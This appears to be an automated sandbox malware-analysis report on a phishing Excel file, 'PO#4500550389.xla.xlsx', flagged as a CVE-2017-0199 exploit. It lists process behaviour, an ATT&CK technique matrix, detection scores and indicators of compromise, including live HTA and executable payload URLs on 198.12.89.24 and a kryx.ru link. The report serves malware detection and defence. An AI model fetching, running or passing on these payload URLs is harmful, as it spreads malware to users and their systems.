Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO#4500550389.xla.xlsxStream path 'MBD00D3132E/Package' entropy: 7.99242442922 (max. 8.0)
Source: PO#4500550389.xla.xlsxStream path 'Workbook' entropy: 7.99946707998 (max. 8.0)
Source: ~DF53F06DAF83250DEA.TMP.0.drStream path 'Package' entropy: 7.99210245611 (max. 8.0)
Source: 55850000.0.drStream path 'MBD00D3132E/Package' entropy: 7.99210245611 (max. 8.0)
Source: 55850000.0.drStream path 'Workbook' entropy: 7.99938943153 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 845Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
Exploitation for Client Execution
1
DLL Side-Loading
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO#4500550389.xla.xlsx29%VirustotalBrowse
PO#4500550389.xla.xlsx22%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://kryx.ru/e3EPl0?&birdcage=long&mail=super&helium=heartbreaking&support0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    s-part-0044.t-0009.fb-t-msedge.net
    13.107.253.72
    truefalse
      high
      edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
      84.201.210.23
      truefalse
        high
        a726.dscd.akamai.net
        95.101.54.235
        truefalse
          high
          kryx.ru
          188.225.72.170
          truefalse
            high
            s-0005.dual-s-msedge.net
            52.123.128.14
            truefalse
              high
              otelrules.svc.static.microsoft
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmlfalse
                  high
                  https://kryx.ru/e3EPl0?&birdcage=long&mail=super&helium=heartbreaking&supportfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xmlfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    13.107.253.72
                    s-part-0044.t-0009.fb-t-msedge.netUnited States
                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    198.12.89.24
                    unknownUnited States
                    36352AS-COLOCROSSINGUSfalse
                    188.225.72.170
                    kryx.ruRussian Federation
                    9123TIMEWEB-ASRUfalse
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1640396
                    Start date and time:2025-03-17 09:40:41 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                    Run name:Potential for more IOCs and behavior
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:PO#4500550389.xla.xlsx
                    Detection:MAL
                    Classification:mal60.expl.winXLSX@6/14@2/3
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.76.243, 199.232.210.172, 52.109.76.144, 51.104.15.252, 13.89.178.27, 52.123.128.14, 20.190.160.66, 4.175.87.197, 95.101.54.235, 95.101.54.226
                    • Excluded domains from analysis (whitelisted): neu-azsc-000.odc.officeapps.live.com, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, res-1.cdn.office.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, login.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, c.pki.goog, wu-b-net.trafficmanager.net, osiprod-neu-bronze-azsc-000.northeurope.cloudapp.azure.com, ecs.office.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, onedscolprdcus03.centralus.cloudapp.azure.com, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, res-stls-prod.edgesuite.net, fe3cr.delivery.mp.microsoft.com, onedscolprduks01.uksouth.cloudapp.azure.com, res-prod.trafficmanager.net, config.officeapps.live.com, osipro
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Report size getting too big, too many NtSetValueKey calls found.
                    TimeTypeDescription
                    04:43:01API Interceptor888x Sleep call for process: splwow64.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    13.107.253.72PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                      S5dpmRJg30.lnkGet hashmaliciousUnknownBrowse
                        NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                          SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                            Quotation.xlsGet hashmaliciousUnknownBrowse
                              https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04StW2tROdwwKr6jRaBFQun7DQsPCpIDdXBBFCv8a7W8LK7Rl6rwBC0tgURk55SBHyIzH8o575VHCM17sxou55q5sU-2BB8ESFPqFu-2FbpVoTlNake-2FQOhgnc23GE2x5-2BOAS2qCBGctpZ2IMzpWiWBU435uwa5-2FmA2HTxNem3-2Bt0ionxJjkqo4GGNcUs5-2BGYyYk-2FC6syojaGqt-2FBR8V6d6AroZskWO-2Btp2xcBwLL3o-2FZl7OSQxQ18gwEx-2BCrEr2XCC-2BjFJ7-2BDOC15dowjH72795CZZSHA-3Da76R_h5tndX3XP82u2CVP7HmVo430WGiFRFD0yG4tHzfM60QIQKknMz-2Bv4cvubxA4sUh-2F1aJ6qoya6273blXHvxERqm-2FEO-2BkfpUsxJp1Gre7i4RpcU3-2BZM-2Bz6eR0jjyehedttUWDFeqz7YehgBaJvqe4tJbDwyMaBzpAl1ycrHcR0yCJQvaIQ4aeF-2BQ-2B79-2B-2FlIK6fkzG-2B9ka9kfr1u2tUL7UElQ6I6ve-2BmqguhJR37zflsfTCQ6XW-2B9olHHI-2F-2FliITE0nSfPOkW6-2FWiGzwdjHPW9q36TssasiqezSGGoZpPD2wXb44aCqqvSglmXXnDeasuIi4iEVz8lUI9WDaOvlSsORhE9XfmCNPK7IqW58SgKJzo1pyrc2FIEkiket3ZcM2YtrGet hashmaliciousUnknownBrowse
                                http://lookerstudio%2e%67%6f%6f%67%6c%65%2e%63%6f%6d/s/tVpHSqKmotAGet hashmaliciousHTMLPhisherBrowse
                                  Copy of 1- GCP Vendor Information Smart Form Stepan.xlsmGet hashmaliciousUnknownBrowse
                                    Copy of 1- GCP Vendor Information Smart Form Stepan.xlsmGet hashmaliciousUnknownBrowse
                                      peYnzEuoAo.exeGet hashmaliciousHancitorBrowse
                                        198.12.89.24PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24/xampp/angel/tsgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped
                                        PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24/xampp/angel/tsgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped
                                        niceworkingskillgivenmebest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                        • 198.12.89.24/346/cosses.exe
                                        Our Order.xlsGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24/xampp/efv/niceworkingskillgivenmebest.hta
                                        Our Order.xlsGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24/xampp/efv/niceworkingskillgivenmebest.hta
                                        PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
                                        PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
                                        DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                                        PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comPO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 217.20.57.34
                                        Fork.exeGet hashmaliciousBabadedaBrowse
                                        • 217.20.57.19
                                        theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                        • 217.20.57.34
                                        AgnotSecurity.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.57.36
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 84.201.210.23
                                        GalaxySoft.exeGet hashmaliciousLummaC StealerBrowse
                                        • 217.20.57.20
                                        Down-2021.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.57.20
                                        GlitchNote.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.57.20
                                        MBRWrite.exeGet hashmaliciousUnknownBrowse
                                        • 217.20.57.20
                                        Setup.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                        • 217.20.57.19
                                        bg.microsoft.map.fastly.netNew order 242.xlsGet hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        5rh5u9yBNf.exeGet hashmaliciousGuLoader, HTMLPhisherBrowse
                                        • 199.232.214.172
                                        SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                                        • 199.232.214.172
                                        Spy-Net.exeGet hashmaliciousSalityBrowse
                                        • 199.232.210.172
                                        #U6d59#U6c5f#U6eab#U5dde#U75c5#U6bd2.exeGet hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        The Earth.exeGet hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        USE INCASE OF A SEVERE FORKIE.exeGet hashmaliciousBabadedaBrowse
                                        • 199.232.210.172
                                        theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                        • 199.232.210.172
                                        FNLJD8Q3.exeGet hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        s-part-0044.t-0009.fb-t-msedge.netPO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        S5dpmRJg30.lnkGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        New order 242.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        zsd5jgZ9LU.exeGet hashmaliciousDanaBotBrowse
                                        • 13.107.253.72
                                        ImageG.exeGet hashmaliciousNovaSentinelBrowse
                                        • 13.107.253.72
                                        MSBuild.exeGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        https://staemcommunuttly.com/gift/activation=Dor5Fhnm1wGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        ATT50896.svgGet hashmaliciousHTMLPhisherBrowse
                                        • 13.107.253.72
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        AS-COLOCROSSINGUSNew order 242.xlsGet hashmaliciousUnknownBrowse
                                        • 192.3.101.146
                                        PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24
                                        QUOTATION#0065864.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                        • 198.46.177.153
                                        New order 242.xlsGet hashmaliciousUnknownBrowse
                                        • 192.3.101.146
                                        PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 198.12.89.24
                                        clearpicturewithmebestthingsforgivenmebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                        • 172.245.123.24
                                        needagoodplanforsuccesstogetbackbest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                        • 23.95.235.28
                                        needagoodplanforsuccesstogetbackbest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                        • 23.95.235.28
                                        niceworkingskillgivenmebest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                        • 198.12.89.24
                                        TIMEWEB-ASRUPO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 188.225.72.170
                                        PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 188.225.72.170
                                        pered.exeGet hashmaliciousUnknownBrowse
                                        • 2.59.41.142
                                        DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 188.225.72.170
                                        DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 188.225.72.170
                                        DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 188.225.72.170
                                        _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                        • 188.225.72.170
                                        _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                        • 188.225.72.170
                                        niga.jarGet hashmaliciousUnknownBrowse
                                        • 2.59.41.142
                                        MICROSOFT-CORP-MSN-AS-BLOCKUSNew order 242.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.246.67
                                        PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        S5dpmRJg30.lnkGet hashmaliciousUnknownBrowse
                                        • 13.107.253.72
                                        New order 242.xlsGet hashmaliciousUnknownBrowse
                                        • 13.107.246.60
                                        PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 13.107.246.60
                                        hgfs.ppc.elfGet hashmaliciousUnknownBrowse
                                        • 13.99.168.12
                                        hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                                        • 52.101.21.152
                                        hgfs.mpsl.elfGet hashmaliciousUnknownBrowse
